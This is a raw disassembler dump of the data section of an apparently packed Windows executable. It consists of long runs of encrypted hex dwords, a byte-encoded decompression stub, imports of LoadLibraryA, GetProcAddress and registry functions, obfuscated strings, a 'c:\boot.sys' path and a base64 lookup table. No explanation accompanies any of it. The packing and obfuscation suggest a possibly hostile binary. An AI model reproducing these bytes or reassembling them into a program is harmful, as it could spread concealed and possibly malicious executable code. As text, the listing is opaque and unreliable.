dd 582106EAh, 640611BAh, 0E8187151h, 49700E0Eh, 2117F67h
dd 589B7F08h, 57EE085h, 284A7427h, 0B952211Dh, 7A8D4D10h
dd 687D49C8h, 468C0C76h, 39578414h, 2BAB7EA4h, 46895F18h
dd 7C1E8B10h, 150FC0E0h, 0FAC38156h, 0B95E551Dh, 721FF87h
dd 60C38356h, 9AB8ECEBh, 1995ED51h, 73D64B18h, 7E748253h
dd 57DACCD5h, 0A577E434h, 0E830B89h, 0AA437632h, 7F478D47h
dd 9036FF47h, 80CC0BECh, 891840F1h, 87838147h, 579E9707h
dd 60579E7Ch, 0AC5A2DBDh, 0B43E8750h, 98057D68h, 6B3CA390h
dd 81E0663Ch, 0C683F06Eh, 7579FF04h, 450C4993h, 2D3218BEh
dd 1EF65810h, 712CD890h, 4650BE9Ch, 0D0480D8Bh, 0DFFBFEEh
dd 0D08A147Dh, 0C83B09B8h, 7541588h, 0FF065574h, 0EF3E1A2Dh
dd 98BC459h, 0F375DF3Bh, 944D1314h, 5379D61Bh, 9E976F9Bh
dd 56F98C35h, 1E47754Ch, 103844F0h, 0E1584B54h, 57184503h
dd 0C3C4DE1Ah, 0FDD7CA06h, 25340125h, 9710F750h, 18161CEBh
dd 0D58C102Eh, 44928733h, 0B618D126h, 1483553Ah, 42F84008h
dd 0A92F05A1h, 0D0EAB1CAh, 9CAB70BFh, 507C7589h, 0E4E8DF2h
dd 58EE5589h, 0E6ED1B75h, 0A5A3D35h, 829505B8h, 0BA8083B0h
dd 9C518C49h, 1C107B9h, 860F5581h, 0A09B0597h, 4E8F0483h
dd 2A748EEAh, 607EC0E5h, 7480350Fh, 0CA061F1Ah, 0AA3162Ah
dd 2A895327h, 2654F7C0h, 0E177C928h, 9E4A7461h, 1274F446h
dd 58A9649Dh, 5847388Ch, 64B7E0F4h, 4F30F400h, 5598430Ch
dd 0D0278DCAh, 0BA1F7827h, 0BCA23DD7h, 3104CA1h, 0A9422A7Ah
dd 81E045C7h, 0DD08A840h, 8A5414B0h, 0DF8E76E5h, 0A33772D6h
dd 0B9D3FF2Dh, 2E0E6A1Fh, 8F3447B4h, 41D60A23h, 0A256C51Eh
dd 315921ADh, 57361087h, 1C6EB780h, 150F04BDh, 0D7374450h
dd 9517F3Ah, 0D0B0FA0Ch, 8A99A266h, 0D54C5304h, 9037BE87h
dd 0A46FC25Ah, 0C7B2FFD3h, 3AC10D10h, 521FEB34h, 0C1D95152h
dd 387D6A78h, 3056D951h, 30EC908h, 345653BFh, 2251FA5h
dd 8CB000E0h, 0D41C27E7h, 80E53AA1h, 3C2D6DBFh, 0F0B31EAh
dd 0F3DC6887h, 71880C60h, 5F04D947h, 985A1039h, 8AE1A4Dh
dd 8123FCD0h, 590C86D7h, 26F011FCh, 420C9C87h, 0FCFCF8E4h
dd 2D812B3Bh, 0D28F5D3Ah, 0C61EE155h, 2C4B0C00h, 0C80CC9D8h
dd 8080C81h, 0E59193DDh, 80F1463h, 88E408F8h, 8BF8F253h
dd 0B38DF84Eh, 0E21D6803h, 855DB93h, 9BA68388h, 0F9A5E59h
dd 842D42Ah, 9E084A89h, 11AF1C01h, 2B651471h, 926F19B8h
dd 0C7F45E9h, 0D620D5C7h, 454CC803h, 10F2D2C2h, 38BAF3E0h
dd 1E770C7Eh, 9F210394h, 0CB113108h, 17212162h, 2156D48Ah
dd 39097EBEh, 0C9347C50h, 73C2D8F3h, 7F04DA2Dh, 1EBEC017h
dd 0E1449C48h, 0D90D74CEh, 897B7091h, 74C2E36Fh, 3B67B893h
dd 8740C20h, 77360F35h, 0EB8FECABh, 0A9658D8h, 0B299219Fh
dd 41431F07h, 810E4112h, 0FE0F5C25h, 81F46D93h, 43037759h
dd 97D75860h, 0C33490C1h, 0AF4476CCh, 3B21D9B0h, 0EC98AF6Dh
dd 9A401AA3h, 75095C00h, 84683DECh, 0B75D4E15h, 161C90EDh
dd 3B0A264Ah, 9A69362Eh, 0F29B08B1h, 6DF30CDEh, 2901C90Ch
dd 0A7581B0Dh, 0DB933491h, 473DDBEFh, 0E944C298h, 308DF586h
dd 69CF0E44h, 992A2D16h, 5314E30Ch, 0B8DDC075h, 60140773h
dd 75727E80h, 2ED21A4Eh, 398756E8h, 7495D233h, 0CA0C7930h
dd 0C048C4B1h, 6F4DB94Dh, 167AB7F7h, 58EC588Bh, 0FFE38110h
dd 0B8C4C0Fh, 6F750806h, 7E0C9B1Bh, 4A47D103h, 0F56B1ED2h
dd 147EE82Dh, 0C61689B9h, 0B85A9246h, 53B78FDh, 3EB1454h
dd 4948C8DEh, 235C1976h, 1925A75h, 2A3A1058h, 366FB76Bh
dd 754FFC8Ch, 796683EAh, 19866680h, 1B5024B6h, 3C17C252h
dd 17C4B618h, 3956BA02h, 1871105Dh, 7D9F2BCBh, 83E34C1h
dd 718B08CEh, 759CDF45h, 0D375615Dh, 5814D214h, 751C5938h
dd 6DBB5B50h, 5D1D41C1h, 804CEF8h, 6A976FDFh, 1450F3CEh
dd 0F8550148h, 5AD2D33Bh, 0C84E476Bh, 139418EBh, 0D4230CEAh
dd 0B6EFA5A6h, 0EBB3FFFAh, 2139D3CAh, 0FDFA8F14h, 4056F61h
dd 16D641C6h, 50646F6h, 5BEB0CDCh, 4A878AE7h, 56E48EF8h
dd 0E6E5C060h, 14A86C5Ah, 89AAADE1h, 0DDB2AF00h, 8B2D6B77h
dd 0A5F33B36h, 0EB3C7C74h, 4B77EDCFh, 3D743E75h, 77147255h
dd 29C28B02h, 0BB76E06h
dd 13D02BDFh, 0A4EB9704h, 1BA0744Dh, 172B7610h, 4EFD686h
dd 3DD2F3DBh, 368DB6Bh, 0CD4D9ADh, 1229CB27h, 18AB9AB4h
dd 202CC22Ah, 86DABB48h, 37110115h, 0B54B4E86h, 0CAAAC243h
dd 46658714h, 0BDAB1F6Fh, 59066A57h, 56FE8B14h, 10E340B8h
dd 0D2991B4h, 0CD6ACC2Dh, 6DC4A3EEh, 156614A0h, 12B302B6h
dd 241E088h, 50D75062h, 29C533Ch, 6FCC0CEEh, 7E8D1EFEh
dd 1FD06608h, 465459C0h, 568AE8EBh, 7ADB8069h, 0E52ECE0Fh
dd 0E7BD3114h, 61DD6CCh, 6820F454h, 642DD81Eh, 619DB0CFh
dd 6500101Dh, 4036A91Ah, 0BDEE5A55h, 462D54B4h, 0FE34FD6Fh
dd 8CA02CB7h, 0F39FF98Ch, 54D6ED6Fh, 0F9D19AB8h, 0DA75273Fh
dd 78EC03Eh, 513C5F82h, 0D4B85393h, 37170E42h, 0BC575BABh
dd 721B6ABAh, 87B249BEh, 3F736DFh, 0F9190B68h, 20B1FC0h
dd 46473C8Ch, 0C800D2C4h, 0FC18888Eh, 0CB85CC8Ch, 0C68DED02h
dd 36B3F803h, 1A24C19Ch, 61B456Ch, 1781BD63h, 27D19A3Fh
dd 7E4D7701h, 908B4298h, 0BD40B06Fh, 830C33FBh, 0E9F714C1h
dd 0A8F1B6CDh, 0F458853h, 3314756Eh, 7DB38447h, 4D8A7447h
dd 32A4170Fh, 7031F620h, 0B1AE6225h, 6BED052h, 646D80B8h
dd 0A38109B3h, 0B2701F29h, 7982FB1Dh, 0CE49E80Ch, 94BE43D1h
dd 5B535241h, 55746A70h, 0B1B9E0A4h, 9E147E08h, 6D5BBAF8h
dd 0C4201CD0h, 23F61122h, 2B762060h, 0D8C7E0E8h, 80180305h
dd 1E89EF17h, 0F02F6CE5h, 8E9076C0h, 0B771FB3Bh, 247B7D1h
dd 8F7BE39Ah, 9F8B2B54h, 97CCFD5Ah, 887880Ch, 0D83B0B02h
dd 351EF012h, 19EA2223h, 64D42846h, 1AF54BECh, 424C22F3h
dd 531F8021h, 735B3320h, 96830111h, 819C0885h, 1C068158h
dd 16D1D043h, 4D99B362h, 0D4BD1E4Bh, 46464646h, 0DC94D8FCh
dd 46F6161Fh, 0A5CBB30Dh, 0EFBD8D69h, 0C78BBF61h, 8BC54D89h
dd 5BBBF18h, 0A25781A3h, 0EC65CC7Eh, 9411A508h, 37893DCAh
dd 9D6F263Eh, 1A496C1Bh, 0B602EC0Fh, 0AB6831FFh, 61135B3h
dd 0FFF04150h, 0FB6C5EF7h, 0A2278303h, 0A559F093h, 88403FBFh
dd 53ABB739h, 0FFFFFE1Ah, 21B30833h, 249F4A8Ah, 43850A90h
dd 0C64657E9h, 0B054212Dh, 171F99EBh, 970E016Dh, 6D3F88B2h
dd 1E3A3175h, 898A4805h, 516CC689h, 8BF54848h, 7992FFEDh
dd 0BF0246E2h, 30306B38h, 0EE6BD78Ah, 5063435h, 768A810Ch
dd 0CF0AD939h, 3F3BB3Ch, 0E11C231Ch, 0FE565ADEh, 0A3AC6A05h
dd 933B7593h, 1B3140A1h, 0B451329h, 14A30820h, 0FBAD46CEh
dd 234BC38Bh, 3CA692C1h, 0A1367014h, 0FBC3946Ch, 42B66C2Eh
dd 0A1728AE7h, 0DA043D8Ah, 0F6C4CD86h, 8B8AD04Bh, 6054F2h
dd 655CE133h, 806FC34Ah, 90494C35h, 0D9884D38h, 0C7DE27B0h
dd 30234E06h, 660F73Fh, 0F5528101h, 18363C05h, 45C72011h
dd 3240C362h, 0F48880C0h, 0EBA21A4Ch, 8C47C7B0h, 83659159h
dd 1C4D6C12h, 2F6D872h, 3C740F0Ah, 0DAB3C212h, 0E106B57h
dd 0E03CCD96h, 74F8083h, 1E0E85D8h, 7B830B4Dh, 8540B94h
dd 8F547C0Fh, 0E7931EE8h, 1BBBBE2Dh, 35750252h, 19741005h
dd 831247F6h, 9E00BD0Bh, 5C6A1075h, 0C530087Bh, 66BBB86Ah
dd 758FA7F3h, 539A570Ah, 163145Ah, 570228C0h, 0B2585232h
dd 0D0D12961h, 39D37B2Ch, 7401D0C6h, 0CC868B71h, 4BEC6419h
dd 8D534F27h, 86CBCD9Eh, 19192190h, 0EF86868Eh, 960E464Eh
dd 1545BCBh, 0B1571375h, 56AC5D25h, 0AB04ACB6h, 5428E6E7h
dd 0CC057B01h, 91919102h, 0DCC4C891h, 919191BCh, 0C0B4B891h
dd 919981D0h, 0E0D8D491h, 0C9452800h, 0E200FFC8h, 9EE886EDh
dd 0BAE904h, 235686F0h, 2170BFC2h, 0BA01FB36h, 8B0E5A4Dh
dd 0C6033C70h, 1C8DB454h, 100641BCh, 0C2D16F00h, 0EB386ED7h
dd 1635EE0h, 0BADD221Ah, 901426FCh, 0F17C0B17h, 7D7A4A76h
dd 0E87F071Dh, 37FFADEh, 8A188AC2h, 751E3ACBh, 30C9841Ah
dd 0C01588Ah, 15BB715Eh, 46905D50h, 0E2751146h, 7605A3FFh
dd 401B05CFh, 831B4FD8h, 83022045h, 8B42A681h, 96723CC7h
dd 57C5FC3Bh, 0BC727AB3h, 20EE4A33h, 8FF06A2Dh, 0B70F0CADh
dd 8DF22B00h, 82D4455Dh, 630B5B8h, 0AA4EDF81h, 53FA2BDAh
dd 6164410Ch, 0C8003170h, 13F452B5h, 0D60F0403h, 3BA5FB0Eh
dd 6F636F74h, 1244176Ch, 0F4533019h, 42671752h, 0C16778F1h
dd 94D55677h, 0EBC4B4Dh, 2BBEC648h, 0CA94091h, 2A02811Dh
dd 87F4E456h, 0B0BED557h, 16387870h, 0ECF20320h, 2D0B157Ah
dd 8B244E75h, 0FA74032Ch, 0DFA3A05Dh, 0FEC5DB0h, 3F53C320h
dd 220F4FFFh, 6B621601h, 20510F48h, 4BD45076h, 9E9E56C1h
dd 2D346883h, 3EA96A38h, 311A57DAh, 0F3481CA3h, 205D12B0h
dd 20481694h, 141C85CFh, 7C8760C2h, 0EC187217h, 47A37862h
dd 3E50CEB3h, 88895B92h, 5E2B66B5h, 1227105h, 0DE210E23h
dd 745FFB67h, 0E91807F1h, 63BB2FA1h, 95C76F14h, 3D24053Fh
dd 5BF7505Ch, 454400D1h, 690076h, 895C0763h, 876DDDC2h
dd 730B64h, 0D7AE0772h, 611B9B75h, 1D6D030Bh, 1B720374h
dd 203C5D63h, 3B558CDFh, 8DC11763h, 6E651F74h, 7D179B21h
dd 49506DCFh, 752EDh, 0B6426F63h, 6937CC0Dh, 0B3275C0Dh
dd 0A9119440h, 3218866Ch, 0F0D0BDB4h, 2EA8685Ch, 0E25E5009h
dd 0DA186809h, 2153B281h, 5606D4F7h, 1C4B5012h, 865A2826h
dd 8308E25Ah, 0F6ADDA95h, 70D85B7h, 22C4AA58h, 5153944Dh
dd 6F3BFC68h, 9476D6EEh, 9C889820h, 0B0060DC8h, 0E46206FEh
dd 14B43EE6h, 0E0B8142Fh, 0DB2DB6C0h, 0CC288FF6h, 57D4D002h
dd 880C7E20h, 68E83EE6h, 79402F0Ch, 0C41B2F73h, 1E241816h
dd 6A38568Bh, 0E21501DEh, 46FA8B1Bh, 1AB859A1h, 6F0DE007h
dd 0B8F716D1h, 5E920920h, 70028934h, 0F25E8BF5h, 4B868940h
dd 63547846h, 0FA22C115h, 0CEFFB894h, 687447EEh, 6CA30458h
dd 0B8D6FF0Eh, 0F3C88648h, 4C50157Ch, 0F41CEA48h, 6A53C1D0h
dd 0ECF329CCh, 3D736F4Dh, 96595183h, 34402FF3h, 51F1F068h
dd 0AC4F076h, 0A012F098h, 53140D0Fh, 0D97A32D4h, 12D84A06h
dd 301330CCh, 1D65E533h, 30E0C303h, 2A345644h, 0B4C9A030h
dd 64FD2B02h, 1C81F50h, 53D3654Bh, 4C6E6970h, 51ADEA0Ch
dd 1211774h, 0AEFEFB49h, 7953FEDDh, 1C6F626Dh, 171A4C63h
dd 74520394h, 8975516Ch, 0DB6B36Ah, 61074979h, 0ED925508h
dd 431B3173h, 0B677A895h, 565C642Bh, 6DAD542Bh, 2D496450h
dd 0AA6B2916h, 669566FEh, 706D6F43h, 7164656Ch, 1B92DB3Eh
dd 0F7F395h, 0C6C06342h, 5A4A68A0h, 0F6B517FAh, 6E49F24Dh
dd 3C455D37h, 0FAA1257Eh, 2D75E85h, 6B957350h, 27B3B09Fh
dd 6F5422BDh, 8D1B6E41h, 0E65176Bh, 644DEA33h, 0B6C7BFF2h
dd 4D024E7Eh, 4CEC4D6Dh, 6761506Bh, 0A802BAD7h, 4FE07B9Ah
dd 661E6662h, 585E7E03h, 17D44DB3h, 421452B5h, 0CEDAA179h
dd 14541AAh, 0C355EE78h, 5417D9F6h, 0F9137079h, 0FF955369h
dd 1A05186Dh, 726B736Fh, 652E6C6Eh, 0D6E12E78h, 664BB536h
dd 7361384Bh, 73364F82h, 4113EFC9h, 69757163h, 77085072h
dd 0DEDB42EDh, 71724973h, 3E0D48ADh, 0BB336961h, 0D7B70B6h
dd 0A37044D4h, 41175D65h, 7C08B14Ch, 0C1749551h, 6764B5DBh
dd 1176AD55h, 0A95B22DCh, 5074E2DAh, 0CC27158Bh, 0FEA870DDh
dd 667542BDh, 81C819D4h, 332CE425h, 0E496029h, 45725F4Bh
dd 6DEA8D0Ch, 63724100h
dd 0F685C5BDh, 0BAA3D6DAh, 0EF33226Eh, 0BC2AAB36h, 0AE69B7h
dd 0A033011Fh, 0CF6C3DE4h, 4136E55Ah, 256F4274h, 2D92B726h
dd 2B959980h, 8DDD662Bh, 70566548h, 156D3C79h, 15876422h
dd 0F9751D14h, 891F491Ah, 59532E0Dh, 4AC8A153h, 8901D5F1h
dd 2D17B618h, 1E69007h, 48041930h, 14B2C95Bh, 1304C04Fh
dd 53C0D743h, 5F9D56B4h, 0CDED4505h, 5340D034h, 5FB34FABh
dd 0FE788B05h, 4F0B46B9h, 0FEEF04BDh, 26C36D03h, 75D452Bh
dd 0B4EF473Fh, 19017210h, 1D733163h, 744F6C34h, 6735697Bh
dd 839B074Dh, 0D6C61AEh, 2B660D49h, 0B1BC4023h, 34B93BAEh
dd 62073903h, 75D064C7h, 171E751Dh, 736D2343h, 0C80D14B0h
dd 61812073h, 7418C188h, 20AF6B61h, 0F74D339Bh, 6307D13Dh
dd 79206F11h, 0E0C43D92h, 1407CF76h, 0DC0CC153h, 79533DF6h
dd 375DF34Fh, 54CF9DD6h, 6E2D4B33h, 520D6C05h, 7BAE066h
dd 137531C3h, 0E61D8DCFh, 4715119Eh, 631544CBh, 8DD74494h
dd 69797069h, 5B1F6E2Dh, 49B6F759h, 65215168h, 89055399h
dd 36B901h, 5881560Bh, 4B971C2Bh, 585EF32h, 0C8D8F307h
dd 2E373135h, 0C44F0700h, 74B06665h, 6ED561B7h, 90B6EBAFh
dd 2F2971E7h, 29671B4Ch, 0EEB1B84h, 8D79930Dh, 1021A367h
dd 13D9ECAEh, 0EB061B20h, 15A9BA1Ah, 530BF32h, 6233092Dh
dd 9B8ACEC2h, 3054770Ch, 6DC62F0Dh, 72C75164h, 0B38F7426h
dd 7D29576Fh, 8D830B6Bh, 1FD5CC34h, 69934F3Eh, 66126C09h
dd 0EF6E2FE7h, 0BAC1A461h, 5779072Eh, 75500D20h, 6C6E7C7h
dd 0B9425761h, 0C46F643Fh, 5C48BEE8h, 750F6F1Fh, 8CA2EF43h
dd 3A774525h, 212308BBh, 0DFE15B64h, 46CEE7DEh, 5F7553B7h
dd 61D2F569h, 44B7C26Ch, 5D43561Fh, 56E88709h, 6D842400h
dd 0B6E8C27Ah, 611F7315h, 0B00409A3h, 0CD90337Fh, 80A80315h
dd 0D034C433h, 0D55BDF34h, 0EE34FFFFh, 1B350F34h, 39352A35h
dd 0D135A635h, 0E035D735h, 6FFA32A7h, 6B36FF55h, 9B368A36h
dd 1099A436h, 1C378A37h, 0FF384638h, 3A17FFFFh, 38C3385Fh
dd 38FE38E2h, 39383928h, 394B3945h, 39B63965h, 39E639D3h
dd 0FFFF39F9h, 3A39FFFFh, 3A473A40h, 3A553A4Eh, 3A633A5Ch
dd 3A713A6Ah, 3A903A78h, 3AA83A9Fh, 3AF43AB1h, 0FFFF3B08h
dd 3B10FFFFh, 3B763B15h, 3C0C3B7Eh, 3C8C3C72h, 3D093C9Fh
dd 3DB03D31h, 3E3A3DB9h, 3E973E80h, 0AF8B3E9Eh, 3EBEFFFFh
dd 3F353F04h, 3F623F4Ch, 3F7D3F6Eh, 84F93FF0h, 0FFF27B10h
dd 20C066FFh, 11310530h, 39312A31h, 78316C31h, 98318931h
dd 2320C31h, 23FFFFC0h, 44332B33h, 0E333C233h, 13340B33h
dd 29341834h, 0FFDDFF8Fh, 0C13458FFh, 0FB34F334h, 29352134h
dd 81352E35h, 0E5CB8935h, 0FD35F335h, 23361635h, 0FFF77F46h
dd 39363036h, 58364136h, 82367C36h, 0DD36BADBh, 53384E36h
dd 0FFFFFF0Eh, 387D38FFh, 38B13890h, 39B1393Eh, 3A223A17h
dd 3A683A5Eh, 3AE83AC6h, 3B283B1Dh, 3B853B7Ch, 0FFFBBFB7h
dd 3C073BFEh, 3C703C68h, 3C803C76h, 3CE7B988h, 3D5D3D50h
dd 453E2E34h, 0FFFFFFFEh, 503E4A3Eh, 6E3E573Eh, 0CD3E783Eh
dd 613EDE3Eh, 853F6C3Fh, 0BF3F933Fh, 0DB3FCA3Fh, 0FF3FE93Fh
dd 0E81EEFFFh, 304CBFF4h, 30D93089h, 30F630DEh, 313A30FDh
dd 315B3141h, 2F103164h, 3194FFF4h, 31A8319Fh, 31F231ADh
dd 353F31F8h, 0FE1B1632h, 0C39E1ADFh, 34BA34AAh, 34D734CBh
dd 8D203508h, 3780356Eh, 3586FE00h, 35A535A0h, 37482778h
dd 0EDF00076h, 380E0F0Dh, 5038A72Ch, 0B7FF6838h, 0CB51BFFFh
dd 19391438h, 26392039h, 34392C39h, 39610039h, 39853976h
dd 399F398Dh, 0EE0B001Bh, 0CBAC39A7h, 0ED17D099h, 0FD5BFE00h
dd 0FA39F539h, 3A4BFF39h, 3A183A10h, 0FF743A1Eh, 1937FFFFh
dd 3B423AB3h, 3B813B73h, 3BAE3BA8h, 3BBA3BB4h, 3BC63BC0h
dd 3BD23BCCh, 2FFF3BD8h, 3BDEFFFDh, 3BEA3BE4h, 3DA23BF0h
dd 3DF33DEEh, 143E0FA0h, 303E213Eh, 423E353Eh, 0FFFFC006h
dd 563E513Eh, 723E603Eh, 893E813Eh, 3D3E903Eh, 0C02B473Fh
dd 83F001BFh, 0A629913Fh, 0C43FBC3Fh, 19FFD53Fh, 0F32D06DBh
dd 15DF30F3h, 1F301A30h, 0F8242430h, 2930EDB7h, 0F5350030h
dd 65303F30h, 1F306A30h, 9EC7E6h, 4931424Eh, 40601997h
dd 1A2FA06h, 4473458Dh, 49FE73F8h, 706802ECh, 3220FB6Bh
dd 4B5C302Eh, 809E268Bh, 5C775C17h, 120F4F0h, 64705505h
dd 95C4B162h, 0AA4EA704h, 0D43BFE77h, 42095A6Ah, 6174536Bh
dd 5307472h, 72476F9Ch, 0D670756Fh, 0A41780Ah, 82C11FACh
dd 0D7347405h, 50167618h, 0D55C7643h, 205B6E73h, 0D7000D01h
dd 1ED709Fh, 6F977EDEh, 1D00BA1Dh, 903E08F6h, 575D155Ch
dd 4640323Ch, 0FB590660h, 2A1F4523h, 0F6338008h, 177EFF85h
dd 15197F18h, 1E285C66h, 7CF73B46h, 0F30AA423h, 3B2480E9h
dd 4362FEE0h, 40101CF2h, 0C131800h, 61765468h, 73C6C9BEh
dd 0E6A1114h, 813E4810h, 1028E054h, 0C2A90040h, 1448EE74h
dd 0E7E04C1Bh, 5660A306h, 90F54C6h, 5AF736A3h, 20054910h
dd 9C4F4004h, 67FB6405h, 20345931h, 4C9C64BDh, 0BE57F6C9h
dd 0C6A49C9Ch, 0A481CF25h, 0F7D068C0h, 0D8799Fh, 683A6816h
dd 0BE0A6ABBh, 0F3482394h, 8D597FDDh, 0A5F3AC7Dh, 0B84BEA4h
dd 0A5D87D8Dh, 0B19E7CA5h, 0F5F0C11Bh, 0E80A74BEh, 76EBB76Ch
dd 0E4A5F847h, 0A40B6468h, 99BEACE6h, 553E205Dh, 0C1692480h
dd 0B0016A7Bh, 14EC7457h, 35196A0Fh, 9E2350Fh, 831FF89Bh
dd 61C94CC4h, 0E19CCD92h, 6AF8DF08h, 6CD437F5h, 400544A6h
dd 0F80D4A9h, 0F7617385h, 0EFBCBE9Dh, 96F26604h, 0F7BAFF00h
dd 0C64420Eh, 14EC358Bh, 6767F4FEh, 1AD64630h, 47831903h
dd 0C2EEBF78h, 3C305204h, 1105842Ah, 6159010Eh, 1E67D98Bh
dd 39EC6859h, 1342A20h, 0F3C868h, 0AD7210FFh, 13DE1A7Ch
dd 0EA60385Ah, 74C3640Ah, 76E0349Fh, 30AFD404h, 0EFEF112Eh
dd 8D047B2Ch, 0FF68D68Dh, 562898D0h, 1DEFBF0Ah, 6C51204Dh
dd 0B55FBBh, 0C0968B59h, 962A3635h, 144876A7h, 570950DDh
dd 2D1E04B6h, 27D8DEAh, 80EFF33h, 0B45420F9h, 575DB023h
dd 57B01D24h, 2057359h, 0CC51h, 0A0286016h, 41101B70h
dd 3C61019Ch, 0C4061801h, 44015C21h, 80C03100h, 0BA0ABA42h
dd 773E9384h, 310400F9h, 0A6922030h, 57908824h, 88040155h
dd 10B2031h, 2090E292h, 1D4010Eh, 0B2C40656h, 20904C04h
dd 6D3EE606h, 1212F125h, 41168844h, 0D25CD830h, 0B27B7DE3h
dd 4456460Ah, 5580B667h, 8A368510h, 69C443ECh, 7301315Ch
dd 165F2006h, 10C54h, 0E12F20F2h, 6E010F79h, 0B078D565h
dd 80C122A0h, 5810CE2h, 21F8DF5h, 0E054840Ch, 837A744Eh
dd 41957ACh, 96046817h, 0B05F5059h, 2EB906Ch, 206C510Ch
dd 7B2CFD48h, 0BC000000h, 71BFh, 1200h, 0BE6000FFh, 406000h
dd 0B000BE8Dh, 8357FFFFh, 10EBFFCDh, 90909090h, 68A9090h
dd 47078846h, 775DB01h, 0EE831E8Bh, 72DB11FCh, 1B8EDh
dd 0DB010000h, 1E8B0775h, 11FCEE83h, 1C011DBh, 75EF73DBh
dd 831E8B09h, 0DB11FCEEh, 0C931E473h, 7203E883h, 8E0C10Dh
dd 8346068Ah, 7474FFF0h, 0DB01C589h, 1E8B0775h, 11FCEE83h
dd 1C911DBh, 8B0775DBh, 0FCEE831Eh, 0C911DB11h, 1412075h
dd 8B0775DBh
dd 0FCEE831Eh, 0C911DB11h, 0EF73DB01h, 1E8B0975h, 11FCEE83h
dd 83E473DBh, 0FD8102C1h, 0FFFFF300h, 8D01D183h, 0FD832F14h
dd 8A0F76FCh, 7884202h, 0F7754947h, 0FFFF63E9h, 28B90FFh
dd 8904C283h, 4C78307h, 7704E983h, 0E9CF01F1h, 0FFFFFF4Ch
dd 0B9F7895Eh, 11Ah, 2C47078Ah, 77013CE8h, 43F80F7h, 78BF275h
dd 66045F8Ah, 0C108E8C1h, 0C48610C0h, 0EB80F829h, 89F001E8h
dd 5C78307h, 0D9E2D889h, 7000BE8Dh, 78B0000h, 3C74C009h
dd 8D045F8Bh, 90003084h, 0F3010000h, 8C78350h, 905096FFh
dd 8A950000h, 0C0084707h, 0F989DC74h, 0AEF24857h, 5496FF55h
dd 9000090h, 890774C0h, 4C38303h, 96FFE1EBh, 9058h, 0DF61E961h
dd 0FFFFh, 25h dup(0)
dd 0A0700000h, 0A0500000h, 3 dup(0)
dd 0A07D0000h, 0A0600000h, 3 dup(0)
dd 0A08A0000h, 0A0680000h, 5 dup(0)
dd 0A0940000h, 0A0A20000h, 0A0B20000h, 0
dd 0A0C00000h, 0
dd 0A0CE0000h, 0
dd 454B0000h, 4C454E52h, 442E3233h, 41004C4Ch, 50415644h
dd 2E323349h, 6C6C64h, 4356534Dh, 642E5452h, 6C6Ch, 64616F4Ch
dd 7262694Ch, 41797261h, 65470000h, 6F725074h, 64644163h
dd 73736572h, 78450000h, 72507469h, 7365636Fh, 73h, 43676552h
dd 65736F6Ch, 79654Bh, 61720000h, 646Eh, 4Bh dup(0)
dd 8, 11h
dword_446484 dd 40h ; DATA XREF: sub_4083E6+D�r
; sub_4083E6:loc_40840C�r ...
word_446488 dw 2Ch ; DATA XREF: sub_408477+C�r
aMcVdB db 'Mc d+B',0 ; DATA XREF: sub_408477+1F�o
word_446492 dw 4Ah ; DATA XREF: sub_408477+27�r
dword_446494 dd 44237Ah ; DATA XREF: sub_408477+A4�r
word_446498 dw 70h ; DATA XREF: sub_408477+FC�r
aCBoot_sys db 'c:\boot.sys',0 ; DATA XREF: sub_408585+44�o
aU09 db 'u0 9',0 ; DATA XREF: sub_408585+13D�o
align 4
dword_4464AC dd 11h, 0Fh dup(0) ; DATA XREF: sub_40886E+E�o
dword_4464EC dd 0E1F7EEA5h, 0BFFD7E2Ch, 869AE87Fh, 0CC244082h, 0D76ADDE2h
; DATA XREF: sub_40886E+9�o
dd 1B77E1E1h, 505215B0h, 0D24B6456h, 3D357C6Bh, 280E85D5h
dd 1AB051F9h, 1E4E8744h, 0E383CCDFh, 323D4737h, 14F80518h
dd 6E0637BFh, 1, 0Eh
dword_446534 dd 0 ; DATA XREF: .text:004086EA�r
; .text:loc_408703�r ...
word_446538 dw 7Eh ; DATA XREF: sub_40876F+8�r
aRgjf db '~ rGjf',0 ; DATA XREF: sub_40876F+28�o
align 8
dword_446548 dd 0Dh ; DATA XREF: sub_408896+E6�r
dword_44654C dd 0 ; DATA XREF: .text:004087E4�r
; .text:loc_4087FD�r ...
dword_446550 dd 206A37h ; DATA XREF: sub_408896+11�r
byte_446554 db 0 ; DATA XREF: sub_408896+21�o
aE4Y db 'e4',27h,'Y',0 ; DATA XREF: sub_408896+CD�o
align 4
dd 2, 11h
dword_446564 dd 0 ; DATA XREF: .text:004089B2�r
; .text:loc_4089CB�r ...
dword_446568 dd 0FFFFFFFFh ; DATA XREF: sub_408A3D+42�r
dd 2Ah dup(0FFFFFFFFh), 3Eh, 3 dup(0FFFFFFFFh), 3Fh, 34h
dd 35h, 36h, 37h, 38h, 39h, 3Ah, 3Bh, 3Ch, 3Dh, 7 dup(0FFFFFFFFh)
dd 0
dd 1, 2, 3, 4, 5, 6, 7, 8, 9, 0Ah, 0Bh, 0Ch, 0Dh, 0Eh
dd 0Fh, 10h, 11h, 12h, 13h, 14h, 15h, 16h, 17h, 18h, 19h
dd 6 dup(0FFFFFFFFh), 1Ah, 1Bh, 1Ch, 1Dh, 1Eh, 1Fh, 20h
dd 21h, 22h, 23h, 24h, 25h, 26h, 27h, 28h, 29h, 2Ah, 2Bh
dd 2Ch, 2Dh, 2Eh, 2Fh, 30h, 31h, 32h, 33h, 85h dup(0FFFFFFFFh)
off_446968 dd offset loc_408ACF ; DATA XREF: sub_408A3D+86�r
dd offset loc_408AE8
dd offset loc_408B19
dd offset loc_408B3C
dd 8
dword_44697C dd 10h ; DATA XREF: sub_408C17+5A�r
dword_446980 dd 0 ; DATA XREF: sub_408B8B+D�r
; sub_408B8B:loc_408BB1�r ...
dword_446984 dd 504641h ; DATA XREF: sub_408C17+17�r
byte_446988 db 65h, 3Ch, 0 ; DATA XREF: sub_408C17+CE�o
aKm1akw db 'KM1Akw',0 ; DATA XREF: sub_408C17+153�o
word_446992 dw 2627h ; DATA XREF: sub_408C17+1BD�o
dd 377F68h
byte_446998 db 20h, 23h, 0 ; DATA XREF: sub_408C17+30B�o
dword_44699B dd 7F6924h ; DATA XREF: sub_408C17+323�r
dword_44699F dd 69586Eh ; DATA XREF: sub_408F56+3B�r
aE8i db 'e|8I ',0 ; DATA XREF: sub_408FEB+12�o
aBvcT4 db 'bc$t4',0 ; DATA XREF: sub_408FEB+110�o
aAFqkY db 'a*FQk~y',0 ; DATA XREF: sub_408FEB+242�o
aTbF db 't F',0 ; DATA XREF: sub_408FEB+333�o
asc_4469BD db '::',0 ; DATA XREF: sub_408FEB+365�o
aC7iO db 'c7i!~~O',0 ; DATA XREF: sub_408FEB+42E�o
